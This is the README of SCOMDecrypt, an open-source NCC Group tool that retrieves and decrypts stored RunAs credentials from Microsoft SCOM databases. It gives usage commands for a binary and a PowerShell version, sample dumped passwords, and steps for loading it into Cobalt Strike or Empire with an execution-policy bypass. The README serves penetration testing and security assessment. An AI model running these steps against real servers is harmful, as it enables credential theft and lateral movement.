
SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers
Publié en open source par NCC Group Plc - http://www.nccgroup.trust/
Développé par Richard Warren, richard [point] warren [arobase] nccgroup [point] trust
http://www.github.com/nccgroup/SCOMDecrypt
Publié sous licence AGPL, voir LICENSE pour plus d'informations
Cet outil est conçu pour récupérer et déchiffrer les informations d'identification RunAs stockées dans les bases de données Microsoft System Center Operations Manager (SCOM).
Pour plus de contexte, veuillez consulter le billet de blog de NCC Group ici
Pour exécuter l'outil, vous aurez besoin de privilèges administratifs sur le serveur SCOM. Vous devrez également vous assurer que vous disposez d'un accès en lecture à la clé de registre suivante :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\MOMBins
Vous pouvez vérifier manuellement que vous pouvez voir la base de données en récupérant les détails de connexion à partir des clés suivantes :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName
L'outil se décline en deux formats.Le premier est un binaire C# qui peut simplement être exécuté sur le serveur SCOM sans arguments, comme suit :
.\SCOMDecrypt.exe
[+] <SCXUser><UserId>bob</UserId><Elev>sudo</Elev></SCXUser>:H a c k T h e P l a n e t
[+] administrator:W i n t e r 2 0 1 5 !
[+] alice:P a s s w 0 r d 1 2 3 !
Il existe également une version PowerShell de l'outil. Celle-ci est utile dans un scénario de post-exploitation, pour être utilisée avec des outils tels que Cobalt Strike ou Empire. Pour utiliser l'outil avec Cobalt Strike :
powershell-import C:\path\to\SCOMDecrypt.ps1
powershell Invoke-SCOMDecrypt
[+] <SCXUser><UserId>bob</UserId><Elev>sudo</Elev></SCXUser>:H a c k T h e P l a n e t
[+] administrator:W i n t e r 2 0 1 5 !
[+] alice:P a s s w 0 r d 1 2 3 !
Pour exécuter dans la console PowerShell :
powershell.exe -exec bypass
. .\Invoke-SCOMDecrypt.ps1
Invoke-SCOMDecrypt